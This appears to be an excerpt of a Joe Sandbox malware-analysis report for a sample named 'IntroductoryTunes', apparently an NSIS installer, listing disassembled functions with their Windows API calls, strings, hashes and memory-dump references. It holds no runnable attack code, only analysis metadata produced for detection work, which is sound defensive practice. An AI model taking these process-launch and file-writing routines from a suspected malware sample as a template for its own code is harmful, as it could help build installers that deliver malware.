Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

@bG, xrefs: 00406162
RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424976,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424976,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424976,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
`G, xrefs: 0040246E
Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: %s not found in %s, xrefs: 0040249A

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424976,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424976,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424976,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(0000E400,00000064,000F5E9E), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNEL32(00719E38), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8
FinePregnancyPossiblySleepingSurgeryMerger, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$FinePregnancyPossiblySleepingSurgeryMerger$Pop: stack empty
API String ID: 1459762280-4165210424
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNEL32(00719E38), ref: 00402387

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
